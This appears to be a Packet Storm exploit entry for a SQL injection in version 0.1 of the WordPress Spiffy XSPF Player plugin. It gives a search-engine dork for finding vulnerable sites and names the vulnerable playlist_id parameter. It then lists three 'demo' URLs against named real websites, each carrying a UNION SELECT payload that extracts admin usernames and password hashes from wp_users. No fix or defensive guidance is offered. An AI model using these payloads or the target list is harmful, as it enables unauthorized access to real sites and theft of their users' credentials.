WordPress Spiffy XSPF Player 0.1 SQL Injection

2013-04-10T00:00:00
ID PACKETSTORM:121204
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-04-10T00:00:00

Description

                                            `##############  
# Exploit Title : WordPress Spiffy XSPF Player plugin SQL Injection  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Home : www.ashiyane.org  
#  
# Security Risk : High  
#  
# Version : 0.1  
#  
# Dork : inurl:wp-content/plugins/spiffy/playlist.php?playlist_id=  
#  
##############  
#Location:site/wp-content/plugins/spiffy/playlist.php?playlist_id=[SQL]  
#  
#  
# Demo:  
# http://www.greatacoustics.org/wp-content/plugins/spiffy/playlist.php?playlist_id=-2+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--  
#  
# http://www.animaterrasings.org/wp-content/plugins/spiffy/playlist.php?playlist_id=-7+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--  
#  
# http://www.jaynekelly.com/wp-content/plugins/spiffy/playlist.php?playlist_id=-2+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--  
#  
##############  
#Greetz to: My Lord ALLAH  
##############  
#  
# Amirh03in  
#  
##############   
`